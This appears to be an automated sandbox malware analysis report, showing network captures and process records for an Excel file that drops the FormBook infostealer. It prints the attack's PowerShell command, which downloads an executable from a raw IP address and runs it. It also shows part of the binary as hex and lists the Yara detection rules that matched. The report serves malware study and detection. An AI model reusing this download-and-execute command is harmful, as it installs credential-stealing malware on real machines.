                                                                                                                                                    Oct 27, 2021 18:19:34.259812117 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.262244940 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.293471098 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293539047 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293576956 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293591976 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.293616056 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293662071 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293699980 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293710947 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.293735981 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.293739080 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293777943 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293817043 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293853998 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.293857098 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.293891907 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321578979 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321613073 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321630955 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321647882 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321665049 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321681023 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321697950 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321715117 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321731091 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321731091 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321748018 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321764946 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321780920 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321791887 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321798086 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321814060 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321831942 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321846008 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321856976 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321868896 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321870089 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321887970 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321904898 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321913958 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.321923971 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.321957111 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.349490881 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349515915 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349617958 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.349888086 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349910975 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349925041 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349942923 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349963903 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.349981070 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350001097 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350013971 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350022078 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350027084 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350042105 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350045919 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350059032 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350073099 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350092888 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350109100 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350126028 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350142002 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350158930 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350178003 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350182056 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350194931 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350197077 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350213051 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350229025 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350235939 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350246906 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350255013 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350266933 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350284100 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350300074 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350316048 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350317955 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350331068 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350346088 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350348949 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350367069 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350382090 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350383997 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350399017 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350415945 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350431919 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350433111 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350449085 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350455046 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350466967 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350482941 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350488901 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.350495100 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350507021 CEST8049746212.192.241.75192.168.2.3
                                                                                                                                                    Oct 27, 2021 18:19:34.350601912 CEST4974680192.168.2.3212.192.241.75
                                                                                                                                                    Oct 27, 2021 18:19:34.380295992 CEST8049746212.192.241.75192.168.2.3

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 212.192.241.75

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349746212.192.241.7580C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Oct 27, 2021 18:19:34.262244940 CEST1166OUTGET /sam/new3.exe HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                    Host: 212.192.241.75
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Oct 27, 2021 18:19:34.293471098 CEST1168INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 27 Oct 2021 16:19:34 GMT
                                                                                                                                                    Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
                                                                                                                                                    Last-Modified: Tue, 26 Oct 2021 23:46:46 GMT
                                                                                                                                                    ETag: "41504-5cf4a171fd45b"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 267524
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 9c f1 03 00 68 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@th#p|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 5708 Parent PID: 744

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:06
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: powershell.exe PID: 6124 Parent PID: 5708

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:10
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:430592 bytes
                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: conhost.exe PID: 2976 Parent PID: 6124

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:10
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: explorer.exe PID: 6892 Parent PID: 6124

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:35
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:3611360 bytes
                                                                                                                                                    MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: explorer.exe PID: 7112 Parent PID: 744

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:36
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                    Imagebase:0x7ff720ea0000
                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: eVJOpc.exe PID: 1840 Parent PID: 7112

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:38
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\eVJOpc.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:267524 bytes
                                                                                                                                                    MD5 hash:0EDC34831B45EDED59BD2AEEF85AA41B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    • Detection: 50%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: eVJOpc.exe PID: 4104 Parent PID: 1840

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:40
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Users\Public\eVJOpc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\eVJOpc.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:267524 bytes
                                                                                                                                                    MD5 hash:0EDC34831B45EDED59BD2AEEF85AA41B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: explorer.exe PID: 3352 Parent PID: 4104

                                                                                                                                                    General

                                                                                                                                                    Start time:18:19:47
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff720ea0000
                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: wlanext.exe PID: 5660 Parent PID: 3352

                                                                                                                                                    General

                                                                                                                                                    Start time:18:20:19
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                    File size:78848 bytes
                                                                                                                                                    MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: cmd.exe PID: 2316 Parent PID: 5660

                                                                                                                                                    General

                                                                                                                                                    Start time:18:20:24
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del 'C:\Users\Public\eVJOpc.exe'
                                                                                                                                                    Imagebase:0xd80000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: conhost.exe PID: 2260 Parent PID: 2316

                                                                                                                                                    General

                                                                                                                                                    Start time:18:20:26
                                                                                                                                                    Start date:27/10/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7f20f0000
